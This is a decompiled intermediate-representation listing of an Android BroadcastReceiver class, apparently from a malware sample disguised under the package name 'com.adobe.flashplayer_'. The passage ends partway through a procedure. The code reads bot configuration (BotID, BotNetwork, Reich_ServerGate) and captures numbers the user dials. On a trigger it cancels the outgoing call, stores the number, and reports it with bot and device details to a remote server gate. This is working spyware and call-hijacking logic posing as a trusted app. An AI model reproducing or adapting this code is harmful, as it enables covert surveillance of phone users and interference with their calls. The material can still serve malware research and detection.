record `com.adobe.flashplayer_.FlashZ` @kind class @AccessFlag PUBLIC extends `android.content.BroadcastReceiver` @kind class {
  `android.media.MediaRecorder` `com.adobe.flashplayer_.FlashZ.recorder` @AccessFlag PUBLIC;
}
procedure `void` `<init>`(`com.adobe.flashplayer_.FlashZ` v1 @kind this) @signature `Lcom/adobe/flashplayer_/FlashZ;.<init>:()V` @AccessFlag PUBLIC_CONSTRUCTOR {
    temp;
    v0;

  #L03685c.  call `<init>`(v1) @signature `Landroid/content/BroadcastReceiver;.<init>:()V` @kind direct;
  #L036862.  v0:= 0I;
  #L036864.  v1.`com.adobe.flashplayer_.FlashZ.recorder` @type ^`android.media.MediaRecorder` := v0 @kind object;
  #L036868.  return @kind void;
}
procedure `java.lang.String` `readConfig`(`com.adobe.flashplayer_.FlashZ` v7 @kind this, `java.lang.String` v8 @kind object @name `config`, `android.content.Context` v9 @kind object @name `context`) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;

  #L03687c.  v4:= "" @kind object;
  #L036880.  call temp:= `openFileInput`(v9, v8) @signature `Landroid/content/Context;.openFileInput:(Ljava/lang/String;)Ljava/io/FileInputStream;` @kind virtual;
  #L036886.  v1:= temp @kind object;
  #L036888.  if v1 == 0 then goto L0368c8;
  #L03688c.  v2:= new `java.io.InputStreamReader`;
  #L036890.  call `<init>`(v2, v1) @signature `Ljava/io/InputStreamReader;.<init>:(Ljava/io/InputStream;)V` @kind direct;
  #L036896.  v0:= new `java.io.BufferedReader`;
  #L03689a.  call `<init>`(v0, v2) @signature `Ljava/io/BufferedReader;.<init>:(Ljava/io/Reader;)V` @kind direct;
  #L0368a0.  v3:= "" @kind object;
  #L0368a4.  v5:= new `java.lang.StringBuilder`;
  #L0368a8.  call `<init>`(v5) @signature `Ljava/lang/StringBuilder;.<init>:()V` @kind direct;
  #L0368ae.  call temp:= `readLine`(v0) @signature `Ljava/io/BufferedReader;.readLine:()Ljava/lang/String;` @kind virtual;
  #L0368b4.  v3:= temp @kind object;
  #L0368b6.  if v3 != 0 then goto L0368ca;
  #L0368ba.  call `close`(v1) @signature `Ljava/io/InputStream;.close:()V` @kind virtual;
  #L0368c0.  call temp:= `toString`(v5) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0368c6.  v4:= temp @kind object;
  #L0368c8.  return v4 @kind object;
  #L0368ca.  call temp:= `append`(v5, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0368d0.  goto L0368ae;
  #L0368d2.  v6:= Exception @type ^`java.io.FileNotFoundException` @kind object;
  #L0368d4.  goto L0368c8;
  #L0368d6.  v6:= Exception @type ^`java.io.IOException` @kind object;
  #L0368d8.  goto L0368c8;
  catch `java.io.FileNotFoundException` @[L036880..L0368d0] goto L0368d2;
  catch `java.io.IOException` @[L036880..L0368d0] goto L0368d6;
}
procedure `void` `saveData`(`com.adobe.flashplayer_.FlashZ` v2 @kind this, `java.lang.String` v3 @kind object @name `data`, `java.lang.String` v4 @kind object @name `f`, `android.content.Context` v5 @kind object @name `context`) @signature `Lcom/adobe/flashplayer_/FlashZ;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;

  #L0368fc.  v0:= new `java.io.OutputStreamWriter`;
  #L036900.  v1:= 0I;
  #L036902.  call temp:= `openFileOutput`(v5, v4, v1) @signature `Landroid/content/Context;.openFileOutput:(Ljava/lang/String;I)Ljava/io/FileOutputStream;` @kind virtual;
  #L036908.  v1:= temp @kind object;
  #L03690a.  call `<init>`(v0, v1) @signature `Ljava/io/OutputStreamWriter;.<init>:(Ljava/io/OutputStream;)V` @kind direct;
  #L036910.  call `write`(v0, v3) @signature `Ljava/io/OutputStreamWriter;.write:(Ljava/lang/String;)V` @kind virtual;
  #L036916.  call `close`(v0) @signature `Ljava/io/OutputStreamWriter;.close:()V` @kind virtual;
  #L03691c.  return @kind void;
  #L03691e.  v1:= Exception @type ^`java.io.IOException` @kind object;
  #L036920.  goto L03691c;
  catch `java.io.IOException` @[L0368fc..L03691c] goto L03691e;
}
procedure `void` `writeConfig`(`com.adobe.flashplayer_.FlashZ` v2 @kind this, `java.lang.String` v3 @kind object @name `config`, `java.lang.String` v4 @kind object @name `data`, `android.content.Context` v5 @kind object @name `context`) @signature `Lcom/adobe/flashplayer_/FlashZ;.writeConfig:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;

  #L036944.  v0:= new `java.io.OutputStreamWriter`;
  #L036948.  v1:= 0I;
  #L03694a.  call temp:= `openFileOutput`(v5, v3, v1) @signature `Landroid/content/Context;.openFileOutput:(Ljava/lang/String;I)Ljava/io/FileOutputStream;` @kind virtual;
  #L036950.  v1:= temp @kind object;
  #L036952.  call `<init>`(v0, v1) @signature `Ljava/io/OutputStreamWriter;.<init>:(Ljava/io/OutputStream;)V` @kind direct;
  #L036958.  call `write`(v0, v4) @signature `Ljava/io/OutputStreamWriter;.write:(Ljava/lang/String;)V` @kind virtual;
  #L03695e.  call `close`(v0) @signature `Ljava/io/OutputStreamWriter;.close:()V` @kind virtual;
  #L036964.  return @kind void;
  #L036966.  v1:= Exception @type ^`java.io.IOException` @kind object;
  #L036968.  goto L036964;
  catch `java.io.IOException` @[L036944..L036964] goto L036966;
}
procedure `void` `onReceive`(`com.adobe.flashplayer_.FlashZ` v26 @kind this, `android.content.Context` v27 @kind object @name `context`, `android.content.Intent` v28 @kind object @name `intent`) @signature `Lcom/adobe/flashplayer_/FlashZ;.onReceive:(Landroid/content/Context;Landroid/content/Intent;)V` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;
    v7;
    v8;
    v9;
    v10;
    v11;
    v12;
    v13;
    v14;
    v15;
    v16;
    v17;
    v18;
    v19;
    v20;
    v21;
    v22;
    v23;
    v24;
    v25;

  #L03698c.  call temp:= `getExtras`(v28) @signature `Landroid/content/Intent;.getExtras:()Landroid/os/Bundle;` @kind virtual;
  #L036992.  v10:= temp @kind object;
  #L036994.  v17:= 0I;
  #L036998.  if v10 != 0 then goto L03699e;
  #L03699c.  return @kind void;
  #L03699e.  v20:= "c" @kind object;
  #L0369a2.  v0:= v26 @kind object;
  #L0369a6.  v1:= v20 @kind object;
  #L0369aa.  v2:= v27 @kind object;
  #L0369ae.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0369b4.  v13:= temp @kind object;
  #L0369b6.  v20:= "BotID" @kind object;
  #L0369ba.  v0:= v26 @kind object;
  #L0369be.  v1:= v20 @kind object;
  #L0369c2.  v2:= v27 @kind object;
  #L0369c6.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0369cc.  v3:= temp @kind object;
  #L0369ce.  v20:= "BotNetwork" @kind object;
  #L0369d2.  v0:= v26 @kind object;
  #L0369d6.  v1:= v20 @kind object;
  #L0369da.  v2:= v27 @kind object;
  #L0369de.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0369e4.  v5:= temp @kind object;
  #L0369e6.  v20:= "BotLocation" @kind object;
  #L0369ea.  v0:= v26 @kind object;
  #L0369ee.  v1:= v20 @kind object;
  #L0369f2.  v2:= v27 @kind object;
  #L0369f6.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0369fc.  v4:= temp @kind object;
  #L0369fe.  v20:= "Reich_ServerGate" @kind object;
  #L036a02.  v0:= v26 @kind object;
  #L036a06.  v1:= v20 @kind object;
  #L036a0a.  v2:= v27 @kind object;
  #L036a0e.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L036a14.  v9:= temp @kind object;
  #L036a16.  v20:= "BotVer" @kind object;
  #L036a1a.  v0:= v26 @kind object;
  #L036a1e.  v1:= v20 @kind object;
  #L036a22.  v2:= v27 @kind object;
  #L036a26.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L036a2c.  v6:= temp @kind object;
  #L036a2e.  v8:= `@@android.os.Build$VERSION.RELEASE` @type ^`java.lang.String` @kind object;
  #L036a32.  v20:= "*" @kind object;
  #L036a36.  v0:= v20 @kind object;
  #L036a3a.  call temp:= `indexOf`(v13, v0) @signature `Ljava/lang/String;.indexOf:(Ljava/lang/String;)I` @kind virtual;
  #L036a40.  v20:= temp;
  #L036a42.  v21:= -1I;
  #L036a46.  v0:= v20;
  #L036a4a.  v1:= v21;
  #L036a4e.  if v0 == v1 then goto L036cd2;
  #L036a52.  if v17 != 0 then goto L036cd2;
  #L036a56.  v17:= 1I;
  #L036a5a.  call temp:= `getResultData`(v26) @signature `Lcom/adobe/flashplayer_/FlashZ;.getResultData:()Ljava/lang/String;` @kind virtual;
  #L036a60.  v20:= temp @kind object;
  #L036a62.  if v20 == 0 then goto L036cd2;
  #L036a66.  v17:= 1I;
  #L036a6a.  v20:= "connectivity" @kind object;
  #L036a6e.  v0:= v27 @kind object;
  #L036a72.  v1:= v20 @kind object;
  #L036a76.  call temp:= `getSystemService`(v0, v1) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L036a7c.  v12:= temp @kind object;
  #L036a7e.  v12:= (`android.net.ConnectivityManager`) v12 @kind object;
  #L036a82.  call temp:= `getActiveNetworkInfo`(v12) @signature `Landroid/net/ConnectivityManager;.getActiveNetworkInfo:()Landroid/net/NetworkInfo;` @kind virtual;
  #L036a88.  v16:= temp @kind object;
  #L036a8a.  v20:= "phone" @kind object;
  #L036a8e.  v0:= v27 @kind object;
  #L036a92.  v1:= v20 @kind object;
  #L036a96.  call temp:= `getSystemService`(v0, v1) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L036a9c.  v18:= temp @kind object;
  #L036a9e.  v18:= (`android.telephony.TelephonyManager`) v18 @kind object;
  #L036aa2.  call temp:= `getDeviceId`(v18) @signature `Landroid/telephony/TelephonyManager;.getDeviceId:()Ljava/lang/String;` @kind virtual;
  #L036aa8.  v7:= temp @kind object;
  #L036aaa.  if v16 == 0 then goto L036cc0;
  #L036aae.  call temp:= `isConnectedOrConnecting`(v16) @signature `Landroid/net/NetworkInfo;.isConnectedOrConnecting:()Z` @kind virtual;
  #L036ab4.  v20:= temp;
  #L036ab6.  if v20 == 0 then goto L036cc0;
  #L036aba.  v11:= "" @kind object;
  #L036abe.  v20:= new `java.lang.StringBuilder`;
  #L036ac2.  call temp:= `valueOf`(v11) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L036ac8.  v21:= temp @kind object;
  #L036aca.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036ad0.  v21:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L036ad4.  v0:= v28 @kind object;
  #L036ad8.  v1:= v21 @kind object;
  #L036adc.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L036ae2.  v21:= temp @kind object;
  #L036ae4.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036aea.  v20:= temp @kind object;
  #L036aec.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L036af2.  v11:= temp @kind object;
  #L036af4.  v20:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L036af8.  v0:= v28 @kind object;
  #L036afc.  v1:= v20 @kind object;
  #L036b00.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L036b06.  v20:= temp @kind object;
  #L036b08.  v21:= "+" @kind object;
  #L036b0c.  v22:= "" @kind object;
  #L036b10.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L036b16.  v20:= temp @kind object;
  #L036b18.  v21:= "*" @kind object;
  #L036b1c.  v22:= "S" @kind object;
  #L036b20.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L036b26.  v20:= temp @kind object;
  #L036b28.  v21:= "#" @kind object;
  #L036b2c.  v22:= "W" @kind object;
  #L036b30.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L036b36.  v15:= temp @kind object;
  #L036b38.  v20:= new `java.lang.StringBuilder`;
  #L036b3c.  call temp:= `valueOf`(v15) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L036b42.  v21:= temp @kind object;
  #L036b44.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036b4a.  v21:= ".txt" @kind object;
  #L036b4e.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036b54.  v20:= temp @kind object;
  #L036b56.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L036b5c.  v20:= temp @kind object;
  #L036b5e.  v0:= v26 @kind object;
  #L036b62.  v1:= v20 @kind object;
  #L036b66.  v2:= v27 @kind object;
  #L036b6a.  call `saveData`(v0, v11, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L036b70.  v20:= new `com.adobe.flashplayer_.FlashVirtual`;
  #L036b74.  call `<init>`(v20) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.<init>:()V` @kind direct;
  #L036b7a.  v21:= 3I;
  #L036b7e.  v0:= v21;
  #L036b82.  v0:= new `java.lang.String`[v0];
  #L036b86.  v21:= v0 @kind object;
  #L036b8a.  v22:= 0I;
  #L036b8e.  v23:= new `java.lang.StringBuilder`;
  #L036b92.  v24:= "&b=" @kind object;
  #L036b96.  call `<init>`(v23, v24) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036b9c.  v0:= v23 @kind object;
  #L036ba0.  call temp:= `append`(v0, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036ba6.  v23:= temp @kind object;
  #L036ba8.  v24:= "&c=" @kind object;
  #L036bac.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036bb2.  v23:= temp @kind object;
  #L036bb4.  v24:= ":" @kind object;
  #L036bb8.  v25:= "" @kind object;
  #L036bbc.  v0:= v24 @kind object;
  #L036bc0.  v1:= v25 @kind object;
  #L036bc4.  call temp:= `replace`(v5, v0, v1) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L036bca.  v24:= temp @kind object;
  #L036bcc.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036bd2.  v23:= temp @kind object;
  #L036bd4.  v24:= "&d=" @kind object;
  #L036bd8.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036bde.  v23:= temp @kind object;
  #L036be0.  v0:= v23 @kind object;
  #L036be4.  call temp:= `append`(v0, v4) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036bea.  v23:= temp @kind object;
  #L036bec.  v24:= "&e=" @kind object;
  #L036bf0.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036bf6.  v23:= temp @kind object;
  #L036bf8.  v24:= "BotPhone" @kind object;
  #L036bfc.  v0:= v26 @kind object;
  #L036c00.  v1:= v24 @kind object;
  #L036c04.  v2:= v27 @kind object;
  #L036c08.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L036c0e.  v24:= temp @kind object;
  #L036c10.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036c16.  v23:= temp @kind object;
  #L036c18.  v24:= "&f=" @kind object;
  #L036c1c.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036c22.  v23:= temp @kind object;
  #L036c24.  v0:= v23 @kind object;
  #L036c28.  call temp:= `append`(v0, v6) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036c2e.  v23:= temp @kind object;
  #L036c30.  v24:= "&g=" @kind object;
  #L036c34.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036c3a.  v23:= temp @kind object;
  #L036c3c.  v0:= v23 @kind object;
  #L036c40.  call temp:= `append`(v0, v8) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036c46.  v23:= temp @kind object;
  #L036c48.  v24:= "&h=blocked_call&i=" @kind object;
  #L036c4c.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036c52.  v23:= temp @kind object;
  #L036c54.  v0:= v23 @kind object;
  #L036c58.  call temp:= `append`(v0, v15) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036c5e.  v23:= temp @kind object;
  #L036c60.  call temp:= `toString`(v23) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L036c66.  v23:= temp @kind object;
  #L036c68.  v21[v22]:= v23 @kind object;
  #L036c6c.  v22:= 1I;
  #L036c70.  v23:= new `java.lang.StringBuilder`;
  #L036c74.  call temp:= `valueOf`(v15) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L036c7a.  v24:= temp @kind object;
  #L036c7c.  call `<init>`(v23, v24) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036c82.  v24:= ".txt" @kind object;
  #L036c86.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036c8c.  v23:= temp @kind object;
  #L036c8e.  call temp:= `toString`(v23) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L036c94.  v23:= temp @kind object;
  #L036c96.  v0:= v27 @kind object;
  #L036c9a.  v1:= v23 @kind object;
  #L036c9e.  call temp:= `getFileStreamPath`(v0, v1) @signature `Landroid/content/Context;.getFileStreamPath:(Ljava/lang/String;)Ljava/io/File;` @kind virtual;
  #L036ca4.  v23:= temp @kind object;
  #L036ca6.  call temp:= `toString`(v23) @signature `Ljava/io/File;.toString:()Ljava/lang/String;` @kind virtual;
  #L036cac.  v23:= temp @kind object;
  #L036cae.  v21[v22]:= v23 @kind object;
  #L036cb2.  v22:= 2I;
  #L036cb6.  v21[v22]:= v9 @kind object;
  #L036cba.  call temp:= `execute`(v20, v21) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L036cc0.  v20:= 0I;
  #L036cc4.  v0:= v26 @kind object;
  #L036cc8.  v1:= v20 @kind object;
  #L036ccc.  call `setResultData`(v0, v1) @signature `Lcom/adobe/flashplayer_/FlashZ;.setResultData:(Ljava/lang/String;)V` @kind virtual;
  #L036cd2.  v20:= "," @kind object;
  #L036cd6.  v0:= v20 @kind object;
  #L036cda.  call temp:= `indexOf`(v13, v0) @signature `Ljava/lang/String;.indexOf:(Ljava/lang/String;)I` @kind virtual;
  #L036ce0.  v20:= temp;
  #L036ce2.  v21:= -1I;
  #L036ce6.  v0:= v20;
  #L036cea.  v1:= v21;
  #L036cee.  if v0 == v1 then goto L03722e;
  #L036cf2.  if v17 != 0 then goto L03722e;
  #L036cf6.  v20:= "," @kind object;
  #L036cfa.  v0:= v20 @kind object;
  #L036cfe.  call temp:= `split`(v13, v0) @signature `Ljava/lang/String;.split:(Ljava/lang/String;)[Ljava/lang/String;` @kind virtual;
  #L036d04.  v14:= temp @kind object;
  #L036d06.  v19:= 0I;
  #L036d0a.  v0:= length @variable v14;
  #L036d0c.  v20:= v0;
  #L036d10.  v0:= v19;
  #L036d14.  v1:= v20;
  #L036d18.  if v0 < v1 then goto L036f7e;
  #L036d1c.  v20:= "connectivity" @kind object;
  #L036d20.  v0:= v27 @kind object;
  #L036d24.  v1:= v20 @kind object;
  #L036d28.  call temp:= `getSystemService`(v0, v1) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L036d2e.  v12:= temp @kind object;
  #L036d30.  v12:= (`android.net.ConnectivityManager`) v12 @kind object;
  #L036d34.  call temp:= `getActiveNetworkInfo`(v12) @signature `Landroid/net/ConnectivityManager;.getActiveNetworkInfo:()Landroid/net/NetworkInfo;` @kind virtual;
  #L036d3a.  v16:= temp @kind object;
  #L036d3c.  v20:= "phone" @kind object;
  #L036d40.  v0:= v27 @kind object;
  #L036d44.  v1:= v20 @kind object;
  #L036d48.  call temp:= `getSystemService`(v0, v1) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L036d4e.  v18:= temp @kind object;
  #L036d50.  v18:= (`android.telephony.TelephonyManager`) v18 @kind object;
  #L036d54.  call temp:= `getDeviceId`(v18) @signature `Landroid/telephony/TelephonyManager;.getDeviceId:()Ljava/lang/String;` @kind virtual;
  #L036d5a.  v7:= temp @kind object;
  #L036d5c.  if v16 == 0 then goto L03699c;
  #L036d60.  call temp:= `isConnectedOrConnecting`(v16) @signature `Landroid/net/NetworkInfo;.isConnectedOrConnecting:()Z` @kind virtual;
  #L036d66.  v20:= temp;
  #L036d68.  if v20 == 0 then goto L03699c;
  #L036d6c.  if v17 != 0 then goto L03699c;
  #L036d70.  v11:= "" @kind object;
  #L036d74.  v20:= new `java.lang.StringBuilder`;
  #L036d78.  call temp:= `valueOf`(v11) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L036d7e.  v21:= temp @kind object;
  #L036d80.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036d86.  v21:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L036d8a.  v0:= v28 @kind object;
  #L036d8e.  v1:= v21 @kind object;
  #L036d92.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L036d98.  v21:= temp @kind object;
  #L036d9a.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036da0.  v20:= temp @kind object;
  #L036da2.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L036da8.  v11:= temp @kind object;
  #L036daa.  v17:= 1I;
  #L036dae.  v20:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L036db2.  v0:= v28 @kind object;
  #L036db6.  v1:= v20 @kind object;
  #L036dba.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L036dc0.  v20:= temp @kind object;
  #L036dc2.  v21:= "+" @kind object;
  #L036dc6.  v22:= "" @kind object;
  #L036dca.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L036dd0.  v20:= temp @kind object;
  #L036dd2.  v21:= "*" @kind object;
  #L036dd6.  v22:= "S" @kind object;
  #L036dda.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L036de0.  v20:= temp @kind object;
  #L036de2.  v21:= "#" @kind object;
  #L036de6.  v22:= "W" @kind object;
  #L036dea.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L036df0.  v15:= temp @kind object;
  #L036df2.  v20:= new `java.lang.StringBuilder`;
  #L036df6.  call temp:= `valueOf`(v15) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L036dfc.  v21:= temp @kind object;
  #L036dfe.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036e04.  v21:= ".txt" @kind object;
  #L036e08.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036e0e.  v20:= temp @kind object;
  #L036e10.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L036e16.  v20:= temp @kind object;
  #L036e18.  v0:= v26 @kind object;
  #L036e1c.  v1:= v20 @kind object;
  #L036e20.  v2:= v27 @kind object;
  #L036e24.  call `saveData`(v0, v11, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L036e2a.  v20:= new `com.adobe.flashplayer_.FlashVirtual`;
  #L036e2e.  call `<init>`(v20) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.<init>:()V` @kind direct;
  #L036e34.  v21:= 3I;
  #L036e38.  v0:= v21;
  #L036e3c.  v0:= new `java.lang.String`[v0];
  #L036e40.  v21:= v0 @kind object;
  #L036e44.  v22:= 0I;
  #L036e48.  v23:= new `java.lang.StringBuilder`;
  #L036e4c.  v24:= "&b=" @kind object;
  #L036e50.  call `<init>`(v23, v24) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036e56.  v0:= v23 @kind object;
  #L036e5a.  call temp:= `append`(v0, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036e60.  v23:= temp @kind object;
  #L036e62.  v24:= "&c=" @kind object;
  #L036e66.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036e6c.  v23:= temp @kind object;
  #L036e6e.  v24:= ":" @kind object;
  #L036e72.  v25:= "" @kind object;
  #L036e76.  v0:= v24 @kind object;
  #L036e7a.  v1:= v25 @kind object;
  #L036e7e.  call temp:= `replace`(v5, v0, v1) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L036e84.  v24:= temp @kind object;
  #L036e86.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036e8c.  v23:= temp @kind object;
  #L036e8e.  v24:= "&d=" @kind object;
  #L036e92.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036e98.  v23:= temp @kind object;
  #L036e9a.  v0:= v23 @kind object;
